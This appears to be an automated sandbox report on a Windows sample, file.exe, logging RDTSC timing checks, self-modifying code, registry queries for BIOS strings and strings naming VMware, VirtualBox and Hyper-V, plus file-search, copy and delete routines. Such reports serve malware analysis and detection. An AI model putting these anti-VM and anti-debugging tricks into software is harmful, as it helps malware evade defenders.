                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0DD1 second address: FF0DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jnp 00007F672053310Eh 0x0000000e jbe 00007F6720533108h 0x00000014 push edi 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1017 second address: FF101B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF101B second address: FF1060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6720533108h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 or di, 8DB8h 0x00000015 or ecx, 5EA925C3h 0x0000001b push 00000004h 0x0000001d mov dword ptr [ebp+122D22F6h], edi 0x00000023 nop 0x00000024 jo 00007F6720533118h 0x0000002a jmp 00007F6720533112h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push ecx 0x00000033 push ebx 0x00000034 pop ebx 0x00000035 pop ecx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF146C second address: FF1470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1767 second address: FF176C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF176C second address: FF1772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1772 second address: FF1786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6720533106h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061596 second address: 10615C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F67208644D3h 0x0000000f jmp 00007F67208644CEh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10615C1 second address: 10615C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10615C5 second address: 10615DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F67208644CDh 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FB91 second address: 105FBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6720533106h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c jmp 00007F6720533114h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F6720533110h 0x0000001b jmp 00007F672053310Fh 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FBD9 second address: 105FBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnl 00007F67208644C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A1C0 second address: 106A1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6720533106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10763E9 second address: 10763EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10763EF second address: 1076415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnl 00007F672053310Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076415 second address: 107641E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107641E second address: 1076424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF905 second address: FAF921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075E4A second address: 1075E4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BE1E second address: 107BE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BE22 second address: 107BE37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BE37 second address: 107BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BFF1 second address: 107BFFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6720533106h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083EC5 second address: 1083ED0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ADB5 second address: 108ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ADBF second address: 108ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D133 second address: 108D137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D137 second address: 108D13B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D13B second address: 108D146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F20 second address: 1091F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10921E9 second address: 10921EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10921EF second address: 10921F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092799 second address: 10927CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6720533110h 0x0000000c ja 00007F6720533106h 0x00000012 pop ecx 0x00000013 jmp 00007F6720533110h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10927CC second address: 10927DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F67208644C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933CA second address: 10933E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6720533118h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097C95 second address: 1097C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097C9D second address: 1097CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A745E second address: 10A747A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67208644D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A72B9 second address: 10A72C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F672053310Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B32BE second address: 10B32C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B32C3 second address: 10B3320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6720533118h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F6720533114h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F672053310Ch 0x0000001c jmp 00007F6720533118h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AAA second address: 10B5AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AB2 second address: 10B5AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6720533113h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AD3 second address: 10B5AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C62B5 second address: 10C62CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6720533106h 0x00000008 jmp 00007F672053310Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C62CF second address: 10C62D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C62D5 second address: 10C6300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6720533106h 0x0000000a jmp 00007F672053310Ch 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6720533111h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6300 second address: 10C630B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F67208644C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C630B second address: 10C6311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C540E second address: 10C5417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C556B second address: 10C55CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F6720533118h 0x0000000b jmp 00007F6720533113h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jng 00007F6720533106h 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 jnp 00007F672053311Eh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55CA second address: 10C55D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55D0 second address: 10C55D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55D4 second address: 10C55D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55D8 second address: 10C55DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5751 second address: 10C5757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5757 second address: 10C575B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C575B second address: 10C5764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5B0E second address: 10C5B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5B14 second address: 10C5B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5B1A second address: 10C5B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5C69 second address: 10C5C7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7A56 second address: 10C7A5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5C6 second address: 10CA5D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5D0 second address: 10CA5F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F6720533116h 0x00000010 jmp 00007F6720533110h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5F0 second address: 10CA647 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F67208644CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jl 00007F67208644CCh 0x00000011 sub dword ptr [ebp+122D2F87h], ebx 0x00000017 push 00000004h 0x00000019 call 00007F67208644D1h 0x0000001e sbb dh, FFFFFF92h 0x00000021 pop edx 0x00000022 call 00007F67208644C9h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F67208644D7h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA647 second address: 10CA67D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F672053310Ch 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F672053310Dh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F672053310Bh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA67D second address: 10CA683 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CDB9D second address: 10CDBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533115h 0x00000007 jmp 00007F672053310Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jns 00007F672053310Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F6720533106h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0322 second address: 4FF0326 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0326 second address: 4FF032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF032C second address: 4FF036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F67208644D3h 0x00000009 sbb esi, 55DF83CEh 0x0000000f jmp 00007F67208644D9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF036A second address: 4FF03AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F6720533114h 0x0000000c add ah, 00000078h 0x0000000f jmp 00007F672053310Bh 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6720533114h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03AC second address: 4FF03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F67208644CBh 0x00000013 sub esi, 516BCC9Eh 0x00000019 jmp 00007F67208644D9h 0x0000001e popfd 0x0000001f mov ch, 08h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03EE second address: 4FF03F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF03F4 second address: 4FF03F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E41A53 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FE6A4F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FF064B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 106BD37 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose 0_2_00BF38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_00BF4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose 0_2_00BEDA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA 0_2_00BEE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose 0_2_00BEED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen 0_2_00BF4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_00BEF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose 0_2_00BF3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_00BE16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose 0_2_00BEDE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose 0_2_00BEBE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BE1160 GetSystemInfo,ExitProcess 0_2_00BE1160
                Source: file.exe, file.exe, 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1399229578.00000000009E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0o
                Source: file.exe, 00000000.00000002.1399229578.0000000000A12000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13627
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13624
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13639
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13679
